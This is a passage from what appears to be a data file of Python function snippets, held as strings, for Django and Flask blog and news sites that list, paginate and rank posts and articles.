Post.objects.annotate(count=Count('likes')).order_by('-count')\r\n }\r\n return render(request, 'blog/best_posts.html', context=context)", "def get_popular_articles():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n query_popular_articles = \"\"\"\n SELECT art.title, COUNT(lg.id) as views\n FROM articles as art\n JOIN log as lg\n ON art.slug = substring(lg.path,10)\n AND lg.status = '200 OK'\n GROUP BY art.title\n ORDER BY views desc\n LIMIT 3; \"\"\"\n c.execute(query_popular_articles)\n articles = from_db_cursor(c)\n db.close()\n return articles", "def get_context(self, request, *args, **kwargs):\n context = super().get_context(request, *args, **kwargs)\n all_posts = PostPage.objects.live().public().order_by('-first_published_at') \n\n page = request.GET.get(\"page\")\n category = request.GET.get(\"category\")\n if category and BlogCategory.objects.filter(slug=category).exists():\n all_posts = all_posts.filter(categories__slug = category)\n\n paginator = Paginator(all_posts, 9)\n\n try:\n posts = paginator.page(page)\n except PageNotAnInteger:\n posts = paginator.page(1)\n except EmptyPage:\n posts = paginator.page(paginator.num_pages)\n\n context[\"posts\"] = posts\n context[\"categories\"] = BlogCategory.objects.all() \n\n return context", "def dashboard_content_article_tag_cloud():\n tag_stats = dict()\n past_30 = offset_time_past(30, str=True)\n articles = mongo.db[app.config['ARTICLES_COLLECTION']]\n results = articles.find({'collected': {'$gt': past_30}}, {'_id': 0})\n for result in results:\n for tag in result.get('tags', list()):\n tag_stats[tag] = tag_stats.get(tag, 0) + 1\n tags_sorted = sorted(tag_stats.items(), key=operator.itemgetter(1),\n reverse=True)[:50]\n data = list()\n for item in tags_sorted:\n data.append({'name': item[0], 'weight': item[1]})\n return jsonify(data)", "def three_most_popular_articles():\n\n # To print information\n information_string = '1. The 3 most popular articles of all time are:\\n'\n\n # Query string\n query = \"\"\"select title,count(*) as num from\n articles,log where\n log.path=CONCAT('/article/',articles.slug)\n group by articles.title\n order by num DESC limit 3;\"\"\"\n\n print(information_string)\n for result in query_db(query):\n print('\\t\"' + str(result[0]) + '\" - ' + str(result[1]) + ' views')\n\n print(\"\\n\")", "def pull_articles(self, *args, **kwargs):\n tasks.pull_articles()\n return Response({})", "def get_mostViewedArticles():\n\n query = \"\"\"\n SELECT articles.title,COUNT(*) as views\n FROM articles JOIN log\n ON log.path LIKE ('/article/' || articles.slug)\n GROUP BY articles.title\n ORDER BY views DESC\n LIMIT 3\n \"\"\"\n\n posts = execute_query(query)\n print('\\nWhat are the most popular three articles of all time?')\n for title, views in posts:\n print(title + \" - \" + str(views) + \" views\")", "def articles():\n \n # Parse through RSS feed of Get Rich Slowly\n feed = feedparser.parse(\"http://www.getrichslowly.org/blog/feed/\")\n \n # Get current username\n username = get_user()\n \n return render_template(\"articles.html\", username=username, feed=feed)", "def data_for_all(request):\n data = common_data(request)\n data.update({\"tags\": Tag.used_tags(),\n \"archive_qualifier\": \"\",\n \"recent_active_months\": Blog.recent_active_months()})\n return data", "def NewArticle(request):\n category_list = Category.objects.all().order_by('created_time')\n tag_list = Tag.objects.all().order_by('created_time')\n GetWebSiteInfo()\n dic = {'category_list':category_list, 'tag_list': tag_list, 'WebSiteInfo': WebSiteInfo}\n return render(request, \"blog/add_article.html\", dic)", "def get_articles(self):\n\t\tarticles = Blog.objects.all()\\\n\t\t\t.filter(publication_date__lte=datetime.date.today())\\\n\t\t\t.order_by('publication_date')\n\t\ti = random.randint(0, articles.count()-1)\n\t\treturn articles, articles[i]", "def all_blogs(request):\n\n blog = Blog.objects.all()\n sort = None\n direction = None\n\n if request.GET:\n if 'sort' in request.GET:\n sortkey = request.GET['sort']\n sort = sortkey\n\n if 'direction' in request.GET:\n direction = request.GET['direction']\n if direction == 'desc':\n sortkey = f'-{sortkey}'\n blog = blog.order_by(sortkey)\n\n current_sorting = f'{sort}_{direction}'\n\n context = {\n 'blog': blog,\n 'current_sorting': current_sorting,\n }\n\n return render(request, 'blog/blogs.html', context)", "def get_context(self, request, *args, **kwargs):\n context = super().get_context(request, *args, **kwargs)\n context[\"posts\"] = MyblogDetailPage.objects.live().public()\n context[\"regular_context_var\"] = \"Hello world 123123\"\n context[\"special_link\"] = self.reverse_subpage('latest_posts')\n context[\"categories\"] = MyBlogCategory.objects.all()\n return context", "def recent_ten(request):\n if request.method == 'GET':\n movies = Movie.objects.filter(date_of_release__lte=datetime.date.today())\n movies = movies.order_by('-date_of_release')[:5]\n serializer = MovieSerializer(movies, many=True)\n return Response(serializer.data)", "def index(request):\n\n # Generate counts of some of the main objects\n num_blogs = Blog.objects.all().count()\n num_authors = BlogAuthor.objects.count()\n num_comments = BlogComment.objects.count()\n\n context = {\n 'num_blogs': num_blogs,\n 'num_authors': num_authors,\n 'num_comments': num_comments,\n }\n\n # Render the HTML template index.html with the data in the context variable\n return render(request, 'index.html', context=context)", "def post_get_recent(requst, limit):\n if requst.method == 'GET':\n recent_posts = Post.objects.order_by('-created_at')[:int(limit)]\n TopicNestedSerializer.Meta.depth = 1\n PostNestedSerializer.Meta.depth = 1\n serializer = PostNestedSerializer(recent_posts, many=True)\n return Response(serializer.data)", "def index(request):\n\n # Generate counts of blog posts and blog authors\n\n num_blogs = Blog.objects.all().count()\n num_authors = BlogAuthor.objects.count()\n\n context = {\n 'num_blogs' : num_blogs,\n 'num_authors' : num_authors,\n }\n\n # Render the HTML template index.html with the data in the context variable\n return render(request, 'index.html', context = context)", "def get_latest_content():\n\n latest_content = {}\n latest_content['all'] = ContentItem.objects.all().order_by('updated_at')[:4]\n latest_content['ga'] = ContentItem.objects.filter(tags__name='Geeks Abroad').order_by('updated_at')[:4]\n latest_content['gaming'] = ContentItem.objects.filter(tags__name='Gaming').order_by('updated_at')[:4]\n latest_content['osalt'] = ContentItem.objects.filter(tags__name='OS.Alt').order_by('updated_at')[:4]\n latest_content['sqa'] = ContentItem.objects.filter(tags__name='Squirrel Army').order_by('updated_at')[:4]\n\n return latest_content", "def get_blogs(request):\n return get_all_posts(request, PostType.BLOG)", "def blog():\n \n articles = mongo.db.articles.find().sort('date',pymongo.DESCENDING)\n return render_template('pages/blog.html',\n title='Blog', \n articles=articles,\n legend='Read the latest articles'\n )", "def create_pagination(request, user=None):\n if user:\n posts = Post.objects.filter(author=user).order_by(\"-timestamp\")\n else:\n posts = Post.objects.all().order_by(\"-timestamp\")\n paginator = Paginator(posts, 5)\n current_page = request.GET.get(\"page\", 1)\n page_obj = paginator.get_page(current_page)\n context = {\"page_obj\": page_obj}\n if request.user.is_authenticated:\n liked_posts = request.user.liked_posts.all()\n context.update({\"liked_posts\": liked_posts})\n return context", "def listLastPosts(self, number):\n\n try :\n entries = self.server.mt.getRecentPostTitles(\n self.blogid, self.username,\n self.password, number)\n\n for e in entries :\n if (\"categories\" in e) :\n category = e['categories'][0]\n else :\n category = 'nil'\n print \"{0} :: {1} in cat. {2} (tags: {3})\".format(\n e['postid'],\n e['title'],\n category,\n e['mt_keywords'])\n\n except xmlrpclib.Fault as fault:\n display_XMLRPC_errors(\"get list of recent posts\", fault)\n\n print # add a blank line", "def entries_index(request):\n blog_entries = Entry.objects.filter(status=2).order_by('-pub_date')\n paginator = Paginator(blog_entries, 4)#4 posts/page\n try:\n page = int(request.GET.get('page','1'))\n except ValueError:\n page = 1\n try:\n entries = paginator.page(page)\n except (EmptyPage, InvalidPage):\n entries = paginator.page(paginator.num_pages)\n return render_to_response('blog/blog.html', {'entries':entries}, RequestContext(request))", "def index():\n page = request.args.get(get_page_parameter(), type=int, default=1)\n limit = 5\n\n entries = db.session.query(Entry).\\\n order_by(desc(Entry.created)).\\\n all()\n pagination = Pagination(\n page=page,\n per_page=limit,\n total=len(entries),\n record_name='entries',\n css_framework='bootstrap5'\n )\n entries_showed = entries[(page - 1) * limit: page * limit]\n\n return render_template(\n 'blog/index.html', entries=entries_showed,\n pagination=pagination\n )", "def get_queryset(self):\n return Post.objects.order_by('-posted')[:5]", "def get_context(self, request, *args, **kwargs):\n context = super().get_context(request, *args, **kwargs)\n context[\"page_title\"] = self.title\n\n categories = NewsCategory.objects.all().order_by(\"category\")\n context[\"categories\"] = categories\n\n # Check for category\n if \"category\" in kwargs:\n category = NewsCategory.objects.filter(\n slug=kwargs[\"category\"],\n ).first()\n news_items = (\n NewsPage.objects.filter(\n news_categories__news_category_id__in=[\n category.pk,\n ],\n )\n .live()\n .public()\n .order_by(\n \"-pinned_on_home\",\n \"home_news_order_pages__order\",\n \"-first_published_at\",\n )\n )\n\n if category.lead_story:\n news_items = news_items.exclude(\n pk=category.lead_story.pk,\n )\n\n context[\"category\"] = category\n else:\n # Get all posts\n news_items = (\n NewsPage.objects.live()\n .public()\n .order_by(\n \"-pinned_on_home\",\n \"home_news_order_pages__order\",\n \"-first_published_at\",\n )\n )\n\n featured_page = NewsPage.objects.filter(\n featured_on_news_home=True,\n ).first()\n\n if featured_page:\n news_items = news_items.exclude(\n pk=featured_page.pk,\n )\n\n # Paginate all posts by 2 per page\n paginator = Paginator(news_items, 9)\n # Try to get the ?page=x value\n page = int(request.GET.get(\"page\", 1))\n\n try:\n # If the page exists and the ?page=x is an int\n posts = paginator.page(page)\n except EmptyPage:\n # If the ?page=x is out of range (too high most likely)\n # Then return the last page\n posts = paginator.page(paginator.num_pages)\n\n start = 1\n total_shown = 10\n\n if paginator.num_pages < total_shown:\n total_shown = paginator.num_pages\n\n if page > 9:\n start = page - 7\n total_shown = 10\n\n if (page + 2) > paginator.num_pages:\n start = paginator.num_pages - 9\n\n context[\"pagination_range\"] = range(start, (start + total_shown))\n\n # \"posts\" will have child pages; you'll need to use .specific in the templates\n # in order to access child properties, such as youtube_video_id and subtitle\n context[\"posts\"] = posts\n\n return context", "def show_archives():\n if not session.get('logged_in'): \n latest = Post.query.filter_by(visible=True)\n else:\n latest = Post.query\n latest = latest.order_by(Post.id.desc()).limit(10)\n months = Post.query.get_months()\n tags = Tag.query.order_by(Tag.name).all()\n #: Needed for calculation of tag cloud\n max_count = Tag.query.get_maxcount()\n categories = sorted(Category.query.all(), key=lambda x: -x.post_count)\n uncategorized_count = Post.query.filter(Post.categories==None).count()\n return render_template('archives.html', latest=latest, tags=tags,\n categories=categories, uncategorized_count=uncategorized_count, \n months=months, max_count=max_count)", "def get_top_articles(update=False):\n # use caching to avoid running unnecessary DB queries at each page load\n key = 'top_ten'\n articles = memcache.get(key)\n\n logging.warn('MEMCACHE | Wiki articles %s' % str(articles))\n\n if (articles is None) or (len(articles) == 0) or update:\n # necessary artificial delay when a new article has just been persisted to the datastore\n if update:\n time.sleep(2)\n\n articles = db.GqlQuery('SELECT * FROM Article ORDER BY updated DESC LIMIT 10')\n articles = list(articles)\n memcache.set(key, articles)\n\n logging.warn('DATASTORE | Wiki articles count %s' % str(len(articles)))\n return articles", "def get_most_popular_articles():\n\tdb = psycopg2.connect(database=DBNAME)\n\tc = db.cursor()\n\tc.execute(\"select t2.title, count(*) as total from log as t1,articles as t2 where t1.path=concat('/article/',t2.slug) group by t2.title order by total desc limit 3 ;\")\n\tdata = c.fetchall()\n\tdb.close()\n\treturn data", "def new_posts(self, number_posts=5) -> Type[QuerySet]:\n return self.published_posts()[:number_posts]", "def last_topic_list(request):\n\ttopics = Topic.objects.order_by('-topic_modification_date')[:50]\n\tfor i in topics:\n\t\tpmax = i.post_set.all().count()/10\n\t\tpmaxten = i.post_set.all().count()%10\n\t\tif pmaxten != 0:\n\t\t\ti.pagination_max = pmax+1\n\t\telse:\n\t\t\ti.pagination_max = pmax\n\tforum_name = _('Last Active Topics')\n\treturn render_to_response(\n\t\t'myghtyboard/mytopics_list.html',\n\t\t{'topics': topics, 'forum_name': forum_name, 'perms': list_perms(request)},\n\t\tcontext_instance=RequestContext(request))", "def most_popular_articles():\n\n results = query_database(QUERIES[0])\n print('\\nWhat are the most popular three articles of all time?\\n')\n for title, views in results:\n print(' * \"{}\" -- {} views'.format(title, views))", "def json_posts_latest():\n posts = posts_base.order_by(Post.pubdate.desc())[:app.config['FEEDITEMS']]\n out = {'posts': []}\n for post_result in posts:\n post_dict = get_public_post_dict(post_result[0], post_result[2])\n out['posts'].append(post_dict)\n\n return jsonify(out)", "def article_list(request):\n try:\n logger.info('Calling the api' + APIURL + '/articles/?format=json&limit=' + str(COUNT))\n response = requests.get(APIURL + '/articles/?format=json&limit=' + str(COUNT))\n parser = json.loads(response.content)\n preview_article = random_article(parser)\n next_read = read_next()\n return render(request, 'article/article_list.html', {'articlelist':parser, 'preview_article': preview_article, 'next_read': next_read})\n except:\n logger.error('Calling the api error in article_list')\n raise Http404(\"Article does not exist\")", "def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n post = get_object_or_404(BlogPost, url=kwargs['slug'])\n\n if not self.request.user.is_authenticated:\n BlogPost.objects.filter(pk=post.pk).update(\n views_count=F('views_count') + 1,\n real_views_count=F('real_views_count') + 1\n )\n\n data['post'] = post\n return data", "def super_more_posts(request, agent):\n if request.is_ajax():\n view_objects = {}\n view_objects[\"wallpost__\" + agent + \"_wallpost\"] = super_supply(\n request,\n request.GET[\"page_name\"],\n agent\n )\n template = render_to_string(agent + \"_news_posts.html\", {\n \"view_objects\": view_objects,\n }, context_instance=RequestContext(request))\n\n return HttpResponse(json.dumps({\n \"contents\": template,\n }), mimetype='application/json')\n\n raise Http404", "def edit_top():\n page = request.args.get(get_page_parameter(), type=int, default=1)\n limit = 5\n\n entries = db.session.query(\n Entry.id, Entry.title, Entry.created, Entry.author_id, User.name).\\\n outerjoin(User, Entry.author_id == User.id).\\\n order_by(desc(Entry.created)).\\\n all()\n pagination = Pagination(\n page=page,\n per_page=limit,\n total=len(entries),\n record_name='entries',\n css_framework='bootstrap5'\n )\n entries_showed = entries[(page - 1) * limit: page * limit]\n\n can_update_all_enrty = False\n if ROLE_PRIV[g.user.role] >= Privilege.EDITOR:\n can_update_all_enrty = True\n\n return render_template(\n 'blog/edit_top.html', entries=entries_showed,\n pagination=pagination,\n can_update_all_enrty=can_update_all_enrty\n )", "def rss(request, blog):\n\tblog = Blog.objects.get(urlname=blog)\n\tarticles = BlogEntry.objects.filter(blog=blog).order_by('-posting_time')[:RSS_COUNT]\n\treturn render_to_response('rss/blog.html', {'blog': blog, 'articles': articles}, context_instance=RequestContext(request))", "def GET_side_posts(self, *a, **kw):\r\n # Server side cache is also invalidated when new article is posted\r\n return self.render_cached('side-posts', RecentArticles, g.side_posts_max_age)", "def bmark_recent(request, with_content=False):\r\n rdict = request.matchdict\r\n params = request.params\r\n\r\n # check if we have a page count submitted\r\n page = int(params.get('page', '0'))\r\n count = int(params.get('count', RESULTS_MAX))\r\n\r\n # we only want to do the username if the username is in the url\r\n username = rdict.get('username', None)\r\n if username:\r\n username = username.lower()\r\n\r\n # We need to check if we have an ordering crtieria specified.\r\n order_by = params.get('sort', None)\r\n if order_by == \"popular\":\r\n if username:\r\n order_by = Bmark.clicks.desc()\r\n else:\r\n order_by = Hashed.clicks.desc()\r\n\r\n else:\r\n order_by = Bmark.stored.desc()\r\n\r\n # thou shalt not have more then the HARD MAX\r\n # @todo move this to the .ini as a setting\r\n if count > HARD_MAX:\r\n count = HARD_MAX\r\n\r\n # do we have any tags to filter upon\r\n tags = rdict.get('tags', None)\r\n\r\n if isinstance(tags, str):\r\n tags = [tags]\r\n\r\n # if we don't have tags, we might have them sent by a non-js browser as a\r\n # string in a query string\r\n if not tags and 'tag_filter' in params:\r\n tags = params.get('tag_filter').split()\r\n\r\n # @todo fix this!\r\n # if we allow showing of content the query hangs and fails on the\r\n # postgres side. Need to check the query and figure out what's up.\r\n # see bug #142\r\n # We don't allow with_content by default because of this bug.\r\n recent_list = BmarkMgr.find(\r\n limit=count,\r\n order_by=order_by,\r\n page=page,\r\n tags=tags,\r\n username=username,\r\n with_tags=True,\r\n )\r\n\r\n result_set = []\r\n\r\n for res in recent_list:\r\n return_obj = dict(res)\r\n return_obj['tags'] = [dict(tag[1]) for tag in res.tags.items()]\r\n\r\n # we should have the hashed information, we need the url and clicks as\r\n # total clicks to send back\r\n return_obj['url'] = res.hashed.url\r\n return_obj['total_clicks'] = res.hashed.clicks\r\n\r\n if with_content:\r\n return_obj['readable'] = dict(res.readable) if res.readable else {}\r\n\r\n result_set.append(return_obj)\r\n\r\n return _api_response(request, {\r\n 'bmarks': result_set,\r\n 'max_count': RESULTS_MAX,\r\n 'count': len(recent_list),\r\n 'page': page,\r\n 'tag_filter': tags,\r\n })", "def top_articles_by_views(articles, top_x):\n p = PageviewsClient()\n\n # create date string based on previous month\n now = datetime.datetime.now()\n previous_month = str(now.month - 1).zfill(2)\n if previous_month == \"00\": previous_month = \"12\"\n start_date = str(now.year) + previous_month + \"0100\"\n end_date = str(now.year) + previous_month + \"2800\"\n\n # get views\n result = p.article_views('en.wikipedia', articles, \n granularity='monthly', start=start_date, end=end_date)\n # clean results (six is used for backwards compatibility with python 2\n result = six.next(six.itervalues(result))\n sorted_articles = sorted(result.items(), \n key=operator.itemgetter(1), reverse=True)\n return sorted_articles[:top_x]", "def NewsArticles():\n health_articles = get_articles('health')\n education_articles = get_articles('technology')\n return render_template('articles.html',health=health_articles, tech =education_articles)", "def get_queryset(self):\n return Article.objects.filter(\n pub_date__lte=timezone.now()\n ).order_by('-pub_date')[:5]", "def education_post_list(request):\n posts = EducationBlogPost.objects.filter(published_date__lte=timezone.now()\n ).order_by('-published_date')\n return render(request, \"education_center/education_blogposts.html\", {'posts': posts})", "def index(request):\n num_blogs = Blog.objects.all().count()\n num_authors = BlogAuthor.objects.all().count()\n num_unique_authors = Blog.objects.distinct().count()\n num_comments = Comment.objects.all().count()\n return render(request, 'index.html', context={'num_blogs' : num_blogs, 'num_authors' : num_authors,\n 'num_unique_authors' : num_unique_authors, 'num_comments' : num_comments})", "def index(request):\n\n # Generate counts of some of the main objects\n num_posts = Post.objects.all().count()\n num_category = Category.objects.all().count()\n \n # The 'all()' is implied by default. \n num_authors = Author.objects.count()\n \n context = {\n 'num_posts': num_posts,\n 'num_category': num_category,\n 'num_authors': num_authors,\n }\n\n # Render the HTML template index.html with the data in the context variable\n return render(request, 'index.html', context=context)", "def _fetch_latest_for_tag(self, tag, today):\n result = []\n url = Fetch163.search_link % urllib2.quote(tag.name.encode('utf8'))\n try:\n resp = urllib2.urlopen(url)\n except urllib2.URLError as e:\n urllib_error(e)\n else:\n doc = eval(resp.read())\n if doc and type(doc) is list:\n if today:\n news_today = self._today_filter(doc, delta=2)\n else:\n news_today = doc\n for d in news_today:\n docid = d.get('docid', '')\n #title = u'%s' % d.get('title', '')\n # the d.get('title') is a unicode string represent by\n # python str, so use unicode-escape to decode it.\n title = d.get('title', '')\n #print type(title)\n news_title = self._trans_title(title)\n if docid and title:\n news_exits = News.objects.filter(\n Q(docid=docid) | Q(title=news_title)\n )\n #print docid, news_title, news_exits\n intro, body, c_num, ptime, pic = self._fetch_news(docid)\n if not news_exits:\n print 'new news', news_title, docid\n news = News()\n news.docid = docid\n news.title = news_title\n news.content = body\n news.tag = tag\n news.comment_num = c_num\n news.list_pic = pic\n news.abstract = intro\n news.update_time = ptime\n news.save()\n import time\n time.sleep(2)\n if news:\n result.append(news)\n else:\n print 'update news', news_title\n n = news_exits[0]\n print 'old:', n.comment_num, 'new:', c_num\n n.comment_num = c_num\n n.save()\n else:\n print 'Fetch news for tag: %s, Error' % tag.name\n\n return result", "def newsfeed(request):\n article_list = Article.objects.order_by('published_date')\n context = {'article_list': article_list}\n return render(request, 'sacms/newsfeed.html', context)", "def get_five_latest(self):\r\n selection = []\r\n sorted(self.tweets, key=lambda tweet: tweet.date, reverse=True)\r\n amount = 5\r\n if self.get_length() < 5:\r\n amount = self.get_length()\r\n for i in range(amount):\r\n selection.append(self.tweets[i])\r\n return selection", "def get_blogs(request):\n address = request.POST.get('address')\n\n results = {\n \"sub\": [],\n \"mine\": [],\n \"browse\": []\n }\n my_blogs = Blog.objects.filter(~Q(msg=\"\"), address_from=address).order_by('-time')\n for m in my_blogs:\n results['mine'].append({\n \"address_from\": m.address_from,\n \"block_index\": m.block_index,\n \"tx_id\": m.tx_id,\n \"msg\": m.msg,\n \"key\": m.key,\n \"time\": m.time\n })\n\n my_sub_ids = [s.address for s in Subscription.objects.all()]\n\n sub_blogs = Blog.objects.filter(~Q(msg=\"\"), address_from__in=my_sub_ids).order_by(\"-time\")\n for m in sub_blogs:\n results['sub'].append({\n \"address_from\": m.address_from,\n \"block_index\": m.block_index,\n \"tx_id\": m.tx_id,\n \"msg\": m.msg,\n \"key\": m.key,\n \"time\": m.time\n })\n\n browsable_blogs = {}\n browse_blogs_db = Blog.objects.filter(~Q(address_from__in=my_sub_ids)).order_by('-time')\n for m in browse_blogs_db:\n if m.address_from not in browsable_blogs:\n browsable_blogs[m.address_from] = {\n \"address_from\": m.address_from,\n \"latest_post_time\": m.time,\n \"total_posts\": 1\n }\n else:\n browsable_blogs[m.address_from]['total_posts'] += 1\n\n results['browse'] = sorted(browsable_blogs.values(), key=lambda k: k['latest_post_time'])\n\n return HttpResponse(json.dumps({\n \"status\": \"success\",\n \"data\": results\n }, default=helpers.json_custom_parser), content_type='application/json')", "def related_articles(self, num):\n related_articles = None\n try:\n related_articles = Article.objects.values('id', 'title', 'view_times', 'update_time', 'author').\\\n filter(tags__icontains=self.tags_list()[0]).\\\n exclude(id=self.id)[:num]\n except IndexError:\n pass\n\n if not related_articles:\n related_articles = Article.objects.values('id', 'title', 'view_times', 'update_time', 'author').\\\n filter(category=self.category).\\\n exclude(id=self.id)[:num]\n\n return related_articles", "def get_queryset(self):\n\t\treturn Post.objects.order_by('-pub_date')[:5]", "def get_recent_news_items():\n news_item_count = request.args.get('newsItemCount') or 3\n try:\n animal_news = AnimalNews.get_printable_news_items_all_animals(news_item_count)\n return jsonify(message=animal_news), 200\n except Exception as e:\n print(e)\n return jsonify(message='{}'.format(e)), 501", "def most_active_post(request, pk):\n update_posts_expiration()\n posts = Post.objects.filter(topic=pk)\n highest_likes = 0\n highest_dislikes = 0\n highest_total_count = 0\n new_total_count = 0\n post_id = 0\n for post in posts:\n\n if (post.likes_count > highest_likes):\n highest_likes = post.likes_count \n \n if (post.dislikes_count > highest_dislikes):\n highest_dislikes = post.dislikes_count \n\n new_total_count = highest_likes + highest_dislikes\n\n if (new_total_count > highest_total_count):\n post_id = post.id\n highest_total_count = new_total_count\n\n post = Post.objects.filter(id=post_id)\n \n serializer = ViewPostSerializer(post, many=True)\n return Response(serializer.data)", "def top_ten(request):\n if request.method == 'GET':\n movies = Movie.objects.filter(date_of_release__lte=datetime.date.today())\n movies = movies.order_by('-rating')[:10]\n serializer = MovieSerializer(movies, many=True)\n return Response(serializer.data)", "def list_all(request):\n\n entries = BlogEntry.objects.all()\n data = {'entries': paginate_objects(request, entries),\n 'blog_info': get_blog_info(), 'action_str': 'All Blogs Shown'}\n\n return render_to_response('blog/list_entries.html', data,\n context_instance=get_rq(request))", "def get_recent_months(self, request, count):\n query = DBSession.query(\n sa.func.year(Post.date),\n sa.func.month(Post.date), \n sa.func.count(Post.date)\n ).filter(\n Post.blog_id==self.id\n ).group_by(\n sa.func.year(Post.date), sa.func.month(Post.date)\n ).order_by(\n sa.desc(sa.func.year(Post.date)), \n sa.desc(sa.func.month(Post.date))\n )\n ret = []\n for y, m, n in query.all():\n year = Year(self, \"%04d\" % y)\n month = Month(year, \"%02d\" % m)\n month.post_count = n\n ret.append(month)\n return ret", "def get_last_posts(self):\n last_posts = []\n r = requests.get(self.target_url)\n html = BeautifulSoup(r.content, 'html.parser')\n raw_posts = html.findAll(\"div\", {\"class\": \"item\"})\n\n for post in raw_posts:\n title_element = post.find(\"a\", {\"class\": \"item-link\"})\n title = self.text(title_element)\n href = title_element['href']\n description = self.text(post.find(\"div\", {\"class\": \"item-info-container\"}))\n id_post = str(post['data-adid'])\n price = self.text(post.find(\"span\", {\"class\": \"item-price\"}))\n image_element = post.find_all(\"img\")\n image_src = image_element[0]['data-ondemand-img'] if image_element else None\n complete_href = self.crawler_url + href\n description = '\\n'.join([title, description, price, complete_href])\n last_posts.append(Post(id=id_post, href=complete_href, description=description, image=image_src))\n return last_posts", "def list(request):\n assert isinstance(request, HttpRequest)\n login = request.user and request.user.is_authenticated()\n article_list = get_article_list('-released_at',login)\n page_no = request.GET.get('page')\n page = _get_page(article_list, page_no, ARTICLER_LIST_PAGE_IN_COUNT )\n auth_form = AuthenticationForm(None, request.POST or None)\n return render(\n request,\n 'app/article_list.html',\n {\n 'title':'ニュース一覧',\n 'year':datetime.now().year,\n 'articles':article_list[:5],\n 'blogs':EntryView.get_entry_list('-posted_at',-1, -1 if not login else request.user.pk )[:5],\n 'contents':range(1,6),\n 'article_list':page.object_list,\n 'auth_form':auth_form,\n 'current_user':request.user,\n 'page' : page,\n 'current_page':request.path #'article_list'\n }\n )", "def home(request):\n\n posts = Post.objects.filter(published=True)\n latest = 0\n if posts:\n latest = Post.objects.latest('updated').unix_time()\n\n return render(request, 'posts/home.html', {'posts':posts, 'latest':latest})", "def home(request):\n context_dict = {}\n categories = []\n general_category = Category.objects.get_or_create(name=\"General Discussion\")[0]\n if general_category:\n categories_qs = Category.objects.exclude(slug=\"general-discussion\").annotate(num_threads=Count('thread')).order_by('-num_threads')\n top_threads = {}\n for category in chain([general_category], categories_qs):\n categories.append(category)\n top_threads[str(category.pk)] = [[thread, str(thread.post_set.count() - 1)] for thread in Thread.objects.filter(category=category, visible=True).order_by('-last_modified')[:2]]\n context_dict['categories'] = categories\n context_dict['top_threads'] = top_threads\n if request.user.is_authenticated():\n member = Member.objects.get(user=request.user)\n if member:\n context_dict['member'] = member\n return render(request, 'home.html', context_dict)\n else:\n return server_error(request)", "def get_queryset(self):\n return Post.objects.order_by('-post_date')[:5]", "def get_top_featured_entries(number=5):\n return list(Entry.published.filter(featured=True)[:number])", "def getRecommendedPosts(request, limit):\n if request.method == 'GET':\n user = request.user;\n scores = {};\n for topic in Topic.objects.filter(visits__user=user).distinct():\n\n last_visit = topic.visits.filter(user=user).order_by('-visit_date')[0].visit_date;\n\n unread_posts = topic.posts.filter(created_at__gt=last_visit)\n for post in unread_posts:\n score = 10 * post.accuracy - (timezone.now()-last_visit).total_seconds()/3600\n scores[post] = score;\n\n extraPosts = Post.objects.exclude(topic__visits__user=user).order_by('-created_at')\n sorted_scores = sorted(scores.items(), key=operator.itemgetter(1), reverse=True)\n recommended_posts = [key for key, value in sorted_scores]\n recommended_posts += extraPosts\n recommended_posts = recommended_posts[:int(limit)]\n\n TopicNestedSerializer.Meta.depth = 1\n PostNestedSerializer.Meta.depth = 1\n serializer = PostNestedSerializer(recommended_posts, many=True);\n return Response(serializer.data)", "def update_all_posts():\n for post in CURRENT_POSTS:\n update_tag(post)", "def all_blogs(request):\n\n posts = Post.objects.all()\n\n context = {\n 'posts': posts\n }\n\n return render(request, 'blog/blog.html', context)", "def articles(self):\n articles = Post.objects.live().descendant_of(self)\n articles = articles.order_by('-date')\n\n return articles", "def articles(self):\n return self.get_queryset().filter(content_type__model='article').order_by('-articles__published_at')", "def _inner_paginate(request, issues, template, extra_template_params):\n visible_issues = [i for i in issues if i.view_allowed]\n _optimize_draft_counts(visible_issues)\n _load_users_for_issues(visible_issues)\n params = {\n 'issues': visible_issues,\n 'limit': None,\n 'newest': None,\n 'prev': None,\n 'next': None,\n 'nexttext': '',\n 'first': '',\n 'last': '',\n }\n if extra_template_params:\n params.update(extra_template_params)\n return respond(request, template, params)", "def _inner_paginate(request, issues, template, extra_template_params):\n visible_issues = [i for i in issues if i.view_allowed]\n _optimize_draft_counts(visible_issues)\n _load_users_for_issues(visible_issues)\n params = {\n 'issues': visible_issues,\n 'limit': None,\n 'newest': None,\n 'prev': None,\n 'next': None,\n 'nexttext': '',\n 'first': '',\n 'last': '',\n }\n if extra_template_params:\n params.update(extra_template_params)\n return respond(request, template, params)", "def top_three_articles():\n query = \"\"\"select articles.title,\n article_path_views.views\n from articles, article_path_views\n where '/article/' || articles.slug = article_path_views.path\n order by views desc\n limit 3\"\"\"\n result_table = execute_query(query)\n\n # generate a report from table_to_report() function\n report = table_to_report(result_table, ' views')\n return \"The Top Three of Most Viewed Articles:\\n\" + report", "def all_news(request):\n\n all_news = News.objects.all().order_by(\"-date_added\")\n context = {\n 'news': all_news,\n 'show_without_bag': True\n }\n return render(request, 'news/news.html', context)", "def get_next_articles(self):\n\t\tarticles = Blog.objects.all()\\\n\t\t\t.filter(publication_date__lte=datetime.date.today())\\\n\t\t\t.order_by('publication_date')\n\n\t\tif articles.count() <= 4:\n\t\t\treturn articles\n\n\t\ti, j, k, l = random.sample(range(0, articles.count()-1), 4)\n\t\treturn [articles[i], articles[j], articles[k], articles[l]]", "def get_posts(request):\n posts = Post.objects.order_by(\"created_date\")\n return render(request, \"blogposts.html\", {\"posts\": posts})", "def sponsored_bar():\n articles = []\n articles.extend([c.child\n for c in Content.objects\n .filter(tags__text='Sponsored First')\n .annotate(recent=Max('issue__issue_date'))\n .order_by('-recent')[:1]])\n articles.extend([c.child\n for c in Content.objects\n .filter(tags__text='Sponsored Second')\n .annotate(recent=Max('issue__issue_date'))\n .order_by('-recent')[:1]])\n articles.extend([c.child\n for c in Content.objects\n .filter(tags__text='Sponsored Third')\n .annotate(recent=Max('issue__issue_date'))\n .order_by('-recent')[:1]])\n articles.extend([c.child\n for c in Content.objects\n .filter(tags__text='Sponsored Fourth')\n .annotate(recent=Max('issue__issue_date'))\n .order_by('-recent')[:1]])\n articles.extend([c.child\n for c in Content.objects\n .filter(tags__text='Sponsored Fifth')\n .annotate(recent=Max('issue__issue_date'))\n .order_by('-recent')[:1]])\n exclude = ['Sponsored First', 'Sponsored Second', 'Sponsored Third',\n 'Sponsored Fourth', 'Sponsored Fifth']\n articles.extend([c.child\n for c in Content.objects\n .filter(tags__text='Sponsored 